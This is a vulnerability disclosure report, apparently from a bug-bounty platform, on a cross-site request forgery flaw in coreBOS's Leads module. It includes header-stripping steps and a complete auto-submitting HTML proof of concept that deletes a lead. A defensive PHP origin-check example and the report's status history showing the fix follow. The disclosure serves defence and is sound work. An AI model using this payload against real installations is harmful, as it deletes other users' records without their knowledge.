Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Jul 21st 2022


Description

CSRF is still possible on the Leads module.

A detailed video is attached (proof of concept).

Tested from: Firefox

Demo URL: https://demo.corebos.com/index.php?module=Leads&action=index&record=&relmodule=Leads

Proof of Concept

Video link: https://vimeo.com/732211543

Steps Involved

  1. Create one & after that, intercept the request
  2. Capture the delete request
  3. Remove the headers: Origin, Referer, Sec-Fetch-Site
  4. Add <meta name="referrer" content="no-referrer"> with CSRF-PoC
  5. Done

CSRF-PoC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.corebos.com/index.php" method="POST">
      <input type="hidden" name="&#95;&#95;vt5rftk" value="sid&#58;b523b60fa9a701abf87cd1d76a6facf8ac8f83a0&#44;1658428539" />
      <input type="hidden" name="allselectedboxes" value="" />
      <input type="hidden" name="from&#95;link" value="DetailView" />
      <input type="hidden" name="cbfromid" value="44845" />
      <input type="hidden" name="module" value="Leads" />
      <input type="hidden" name="record" value="44845" />
      <input type="hidden" name="isDuplicate" value="false" />
      <input type="hidden" name="action" value="Delete" />
      <input type="hidden" name="return&#95;module" value="Leads" />
      <input type="hidden" name="return&#95;id" value="" />
      <input type="hidden" name="return&#95;action" value="index" />
      <input type="hidden" name="lead&#95;id" value="44845" />
      <input type="hidden" name="parent&#95;id" value="44845" />
      <input type="hidden" name="email&#95;directing&#95;module" value="" />
      <input type="hidden" name="emailids" value="44845&#64;46&#124;" />
      <input type="hidden" name="pmodule" value="Leads" />
      <input type="hidden" name="cbcustominfo1" value="" />
      <input type="hidden" name="cbcustominfo2" value="" />
       <meta name="referrer" content="no-referrer">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

Cross-site request for the deletion of leads
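
A server-side check that fails closed when the three headers named in step 3 are absent, as an added example: it is not coreBOS code and not the change made in the fix commit. The function names and the trusted origin are assumptions, and the check is meant to run alongside the per-session token, not to replace it.

```php
<?php
// Added example, not coreBOS code. Names and $trusted are assumptions.

// Returns the scheme://host[:port] of a URL, or null for "null"/malformed values.
function originOf(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host']);
    return isset($p['port']) ? $origin . ':' . $p['port'] : $origin;
}

// Decides from the headers alone whether a request may change state.
// $headers maps lower-cased header names to their received values.
function isSameOriginWrite(string $method, array $headers, string $trusted): bool
{
    if (in_array(strtoupper($method), ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods must not change state; nothing to check
    }
    // Fetch metadata, when sent, states the relationship outright.
    if (isset($headers['sec-fetch-site'])) {
        return $headers['sec-fetch-site'] === 'same-origin';
    }
    // Otherwise fall back to Origin, then Referer.
    foreach (['origin', 'referer'] as $name) {
        if (!empty($headers[$name])) {
            return originOf($headers[$name]) === $trusted;
        }
    }
    // None of the three headers arrived: reject instead of assuming same-origin.
    return false;
}

// Constructed sample requests (not captured traffic).
$trusted = 'https://crm.example.test';
$cases = [
    'same-origin form' => ['POST', ['origin' => $trusted, 'sec-fetch-site' => 'same-origin']],
    'cross-site form'  => ['POST', ['origin' => 'https://other.example.test', 'sec-fetch-site' => 'cross-site']],
    'Origin: null'     => ['POST', ['origin' => 'null']],
    'headers stripped' => ['POST', []],
    'plain GET'        => ['GET', []],
];
foreach ($cases as $label => [$method, $headers]) {
    $verdict = isSameOriginWrite($method, $headers, $trusted) ? 'allow' : 'reject';
    printf("%-18s %s\n", $label, $verdict);
}
```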

We are processing your report and will contact the tsolucio/corebos team within 24 hours. (4 months ago)
We have contacted a member of the tsolucio/corebos team and are waiting to hear back. (4 months ago)
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. (4 months ago)
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. (4 months ago)
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. (4 months ago)
Joe Bordes validated this vulnerability 3 months ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP (Researcher), 3 months ago

@maintainer @admin

After fixing, can we track it as a CVE?

We have sent a fix follow up to the tsolucio/corebos team. We will try again in 7 days. (3 months ago)
Joe Bordes marked this as fixed in 8.0 with commit d0bf45 3 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE